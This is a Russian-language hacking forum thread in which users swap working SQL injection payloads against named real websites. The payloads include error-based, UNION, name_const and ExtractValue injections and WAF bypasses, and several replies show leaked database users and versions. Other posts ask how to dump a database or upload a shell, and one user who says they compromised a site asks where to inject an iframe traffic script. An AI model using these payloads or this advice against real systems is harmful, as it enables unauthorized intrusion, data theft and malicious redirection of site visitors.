Ваши вопросы по уязвимостям.

нет там ничего ИМХО

 

Попытка слепого метода в Havij

Почему когда Length of 'Current DB' is 16 все выводит нормально
А когда Length of 'Current DB' is 63 выводится все в кубиках ?

 

Code:

http://www.artena.ru/index.php?altname=sitemap/print/'

Возможно ли тут продвинуться дальше?)

 

Не продвинешься

http://www.artena.ru/index.php?altname=sitemap/print'/**/and/**/(select/**/1/**/from/**/(select/**/(count(*)),concat((select/**/version()/**/from/**/information_schema.tables/**/limit/**/0,1),0x00,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by(x))/**/a)/**/or/**/'

1044: Access denied for user 'artenaru_artena'@'localhost'

 

Юнион тоже актуален, в сорцах странице отображается, но бессмысленно)

HTML:

http://www.artena.ru/index.php?altname=sitemap/print'union/**/select(1),concat(1999,user(),1,version(),1,database()),34,4,5,6,7,8,user(),'10

 

Можно ли как-то это раскрутить.
http://playzet.ru/stats/hlstats.php?game=dods&minkills=1&mode=players&rank_type=%5c

 

Там параметр походу выставляется статически, исходя по известным значениям, по параметрам можно только выбрать.Свой запрос туда не вставить

 

Не всё потеряно -

HTML:

http://playzet.ru/stats/hlstats.php?mode=weaponinfo&weapon=wdeagle\&game=%20or%201=1%20and%20@a:=1%20group%20by%20concat%28user%28%29,version%28%29,database%28%29,if%28@a=0,@a:=1,@a:=0%29%29%20having%20min%280%29%20--%20w

 

подскажите, если havij находит БД и таблицы с названием ???, есть ли смысл крутить что еще?

 

В конфигах апача прописан alias, например, /secret-folder/ ссылается на /var/private/secret/.

И таким образом, при обращении ко всем доменам на сервере по URLу
domen.com/secret-folder/ все будут попадать туда.

Можно ли как-то закрыть туда доступ для определенного домена?
Вариации через .htaccess не работают, так как он имеет меньший приоритет перед конфигами апача.

 

но, есть смысл протестировать тот же параметр в SQLMAP

 

Известна версия '5.5.27-log

Code:

http://www.briese.net.ua/shkala-zarplat%27and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%27

но дальше ни в какую не хочет раскручиваться.

 

http://www.briese.net.ua/shkala-zarplawertt%27and%28select%201%20from%28select%201%20from%28select%201%20union%20select%202%20%29fr%20group%20by%20concat%281,user%28%29,@a:=@a-1%29%20having%20min%28@a:=1%29%29s%29%20--%20w

 

Code:

http://www.iglobalforum.com/event.php?id=-90'+/*union*/+/*select*/+1,2,3,4,5/*

чет не получается может кто поможет нормально раскурить?

 

как посчитали 5 колонок? и что там делает кавычка? скуля же integer..

http://www.iglobalforum.com/event.php?id=90+and+0+/*!union*/select+1,2,3,4,version(),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3--+


вывод в <img src=version()..>

 

http://wiki.auditory.ru/Semenov_sql_injection'
Не разберусь, WAF меняет пробелы и "+" "_", обходится /**/. Дальше не могу.

 

http://wiki.auditory.ru/Semenov_sql_injection'or(ExtractValue(1,concat(0x3a,(select(version())))))='1

 

привет )) взломал сайт а там такое в файле INDEX.PHP такое :

<?php
include 'init.php';
$language = $frontend->getDefaultLanguage();
$url = NeoRequest::getAbsoluteUri() . $language->ln . _NEO_CMS_FILE_EXT;
NeoNavigator::jump($url);
?>

и такое :

<?php
include 'init.php';
include 'process.php';
?>

вот как выглядит сама система :
http://i42.tinypic.com/112hpud.jpg

КУДА ВСТАВЛЯТь скрипт на ифрейм траффик и вообше почему совсем не такое как везде?

 

При переходе на сайте на list.html?page=&page='
выдает

Можно как-то раскрутить и попробовать слить бд или залить шелл? Хелпаните..
Если поставить скобки или другой символ, то же самое выдает.

С &page=(select+top+1+table_name+from+information_schema.tables)

Выдает мне Conversion failed when converting the nvarchar value 'Таблица' to data type int. (severity 16) in .....

но при
(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+('эта таблица'))
выдает мне message: Incorrect syntax near 'эта же таблица\'. (severity 15) in ....